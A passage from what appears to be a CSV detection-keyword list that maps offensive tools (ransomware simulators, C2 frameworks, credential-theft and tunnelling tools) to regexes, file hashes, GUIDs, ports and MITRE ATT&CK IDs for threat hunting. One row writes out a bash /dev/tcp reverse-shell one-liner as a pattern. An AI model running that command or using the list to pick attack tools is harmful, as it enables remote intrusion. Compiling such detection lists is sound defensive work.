TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*>Jasmin Encryptor<*",".{0,1000}\>Jasmin\sEncryptor\<.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*>Jasmin Ransomware</div>*",".{0,1000}\>Jasmin\sRansomware\<\/div\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*>JSP Backdoor Reverse Shell<*",".{0,1000}\>JSP\sBackdoor\sReverse\sShell\<.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*>KerberOPSECKerberOPSEC\<\/.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*>Obfuscar Console Utility<*",".{0,1000}\>Obfuscar\sConsole\sUtility\<.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*>Password Recovery for Remote Desktop<*",".{0,1000}\>Password\sRecovery\sfor\sRemote\sDesktop\<.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*>Remote Desktop PassView<*",".{0,1000}\>Remote\sDesktop\sPassView\<.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*>SharpSploit<*",".{0,1000}\>SharpSploit\<.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*>TeamFiltration.dll<*",".{0,1000}\>TeamFiltration\.dll\<.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*>Tor2web Error: *",".{0,1000}\>Tor2web\sError\:\s.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*>User32LogonProcesss<*",".{0,1000}User32LogonProcesss.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://x.com/_RastaMouse/status/1747636529613197757","1","0","typo in the process name used when calling LsaRegisterLogonProcess","10","10","N/A","N/A","N/A","N/A" "*0.0.0.0:2222*",".{0,1000}0\.0\.0\.0\:2222.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*0.0.0.0:4444*",".{0,1000}0\.0\.0\.0\:4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*0.0.0.0:4445*",".{0,1000}0\.0\.0\.0\:4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*0.0.0.0:53531*",".{0,1000}0\.0\.0\.0\:53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*0<&196;exec 196<>/dev/tcp/*/*; sh <&196 >&196 2>&196*",".{0,1000}0\<\&196\;exec\s196\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}\;\ssh\s\<\&196\s\>\&196\s2\>\&196.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*00_create_all_modules_test*",".{0,1000}00_create_all_modules_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*",".{0,1000}00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*",".{0,1000}00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team 
framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a*",".{0,1000}00393218120b164c3069439284c49edd5a99be83482ed9149ce9af0e8026e61a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524*",".{0,1000}004126d3014ab8a47172a1b7b0c88673283f9f245e1ce550846ef71bcac84524.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f*",".{0,1000}004b28244f398a619fe7d668f5ab925210e8a720c82344ae2f5acefaff30672f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*00630066-0B43-474E-A93B-417CF1A65195*",".{0,1000}00630066\-0B43\-474E\-A93B\-417CF1A65195.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69*",".{0,1000}00a5af2d7b92becb455b7c5f00faba0aaf6176143601b2cf69cfe2d1ade75f69.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b*",".{0,1000}00b810771a57f7aab571f2e63288ef88e4929b941108dd5e5ae9bedebf4ef49b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*00cce05cfc7ac3c284be62e98c8ffb25*",".{0,1000}00cce05cfc7ac3c284be62e98c8ffb25.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*01_all_exploits_have_payloads_test*",".{0,1000}01_all_exploits_have_payloads_test.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8*",".{0,1000}013e2375bb6c35daca9df2a98e5ce1c963608129ce70c800fcdecb7cf63be3f8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21*",".{0,1000}0162e0e84eafc8ad462d99ab698da4deb9d8363a5c02a5624b3dc3640ebd3e21.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c*",".{0,1000}017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48*",".{0,1000}01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*01C142BA-7AF1-48D6-B185-81147A2F7DB7*",".{0,1000}01C142BA\-7AF1\-48D6\-B185\-81147A2F7DB7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84*",".{0,1000}01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3*",".{0,1000}01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","N/A","8","N/A","N/A","N/A","N/A","N/A" 
"*01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce*",".{0,1000}01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292*",".{0,1000}02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" "*02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b*",".{0,1000}02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45*",".{0,1000}020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6*",".{0,1000}02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79*",".{0,1000}021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f*",".{0,1000}0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82*",".{0,1000}0253413ed641b86b351fc3b9355715f7d62c74bc1d954dd0c9cff13693535a82.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621*",".{0,1000}0257fba1e0ecd10af76bf252a76f03656f194bb2173f8555dabd86a03c7df621.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a*",".{0,1000}026a94e75aa94054623b3e2d617c8c59ce6e63edce3e739cbe94283a1eca394a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846*",".{0,1000}027954d28fd8fa98e06be72439e5a987d2d280a8e3c8d2ab91a4a55d39cbe846.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba*",".{0,1000}027bf95a524ee9daf472869e548c9221b16d4a5230de187e5ae9ba9a9e98cfba.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" 
"*02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c*",".{0,1000}02947e9a3759fea352b81bdf4390b6dfb5ea5823ed4836e1e7a46e5d9b65263c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*02948DD6-47BD-4C82-9B4B-78931DB23B8A*",".{0,1000}02948DD6\-47BD\-4C82\-9B4B\-78931DB23B8A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa*",".{0,1000}029558a5c334d67b479885be83f0e0dc856189d1de14ad1d4136b7d451498daa.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*02EF15C0-BA19-4115-BB7F-F5B04F7087FE*",".{0,1000}02EF15C0\-BA19\-4115\-BB7F\-F5B04F7087FE.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - 
